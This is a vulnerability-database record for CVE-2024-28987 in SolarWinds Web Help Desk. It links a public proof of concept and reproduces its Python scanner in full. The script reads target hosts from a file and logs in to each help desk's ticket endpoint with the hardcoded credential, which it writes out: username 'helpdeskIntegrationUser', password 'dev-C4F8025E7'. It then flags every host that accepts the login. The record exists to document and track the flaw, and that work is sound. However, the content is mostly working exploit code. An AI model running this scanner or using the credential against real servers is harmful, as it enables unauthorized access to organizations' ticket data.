{"uuid": "20187f45-138c-48ba-b11f-52dc3ddfd69e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Proof-of-Concept", "description": "A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC\n\n\n```python\nimport argparse\nimport base64\nimport requests\n\n# Created by Ghost sec.\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\nascii_art = f\"\"\"\n{BOLD}{RED}\n ______ __ __ \n / \\ / | / | \n/$$$$$$ |$$ |____ ______ _______ _$$ |_ _______ ______ _______ \n$$ | _$$/ $$ \\ / \\ / |/ $$ | / | / \\ / |\n$$ |/ |$$$$$$$ |/$$$$$$ |/$$$$$$$/ $$$$$$/ /$$$$$$$/ /$$$$$$ |/$$$$$$$/ \n$$ |$$$$ |$$ | $$ |$$ | $$ |$$ \\ $$ | __ $$ \\ $$ $$ |$$ | \n$$ \\__$$ |$$ | $$ |$$ \\__$$ | $$$$$$ | $$ |/ | $$$$$$ |$$$$$$$$/ $$ \\_____ \n$$ $$/ $$ | $$ |$$ $$/ / $$/ $$ $$/ / $$/ $$ |$$ |\n $$$$$$/ $$/ $$/ $$$$$$/ $$$$$$$/ $$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ \n PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel\n{RESET}\n\"\"\"\n\nprint(ascii_art)\n\ndef get_basic_auth_header(username, password):\n credentials = f\"{username}:{password}\"\n base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8')\n return {'Authorization': f'Basic {base64_credentials}'}\n\ndef scan_target(hostname):\n # Ensure hostname does not have trailing slashes\n hostname = hostname.strip().rstrip('/')\n url = f\"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/\"\n \n # Print formatted URL for debugging\n print(f\"{BOLD}[*] Scanning URL: {url}{RESET}\")\n \n headers = get_basic_auth_header(\"helpdeskIntegrationUser\", \"dev-C4F8025E7\")\n headers['Content-Type'] = 'application/x-www-form-urlencoded'\n \n try:\n response = requests.get(url, headers=headers, timeout=10)\n if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text:\n print(f\"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}\")\n else:\n print(f\"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}\")\n except requests.RequestException:\n # Modify this line to just print \"Not vulnerable\" instead of the error details\n print(f\"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}\")\n\ndef scan_targets_from_file(file_path):\n try:\n with open(file_path, 'r') as file:\n targets = file.readlines()\n if not targets:\n print(f\"{BOLD}{RED}[!] No targets found in file{RESET}\")\n return\n for target in targets:\n target = target.strip()\n if target:\n scan_target(target)\n except FileNotFoundError:\n print(f\"{BOLD}{RED}[!] File {file_path} not found{RESET}\")\n except Exception as e:\n print(f\"{BOLD}{RED}[!] An error occurred: {e}{RESET}\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential\")\n parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets')\n\n args = parser.parse_args()\n \n scan_targets_from_file(args.file)\n\nif __name__ == \"__main__\":\n main()\n```", "description_format": "markdown", "vulnerability": "CVE-2024-28987", "creation_timestamp": "2024-10-18T22:23:39.387177+00:00", "timestamp": "2024-10-18T22:23:49.363557+00:00", "related_vulnerabilities": ["CVE-2024-28987"], "meta": [{"tags": ["vulnerability:exploitability=documented", "vulnerability:information=PoC"]}], "author": {"login": "cedric", "name": "C\u00e9dric Bonhomme", "uuid": "af0120d0-3dac-4a6a-974b-a9f33d2a9846"}}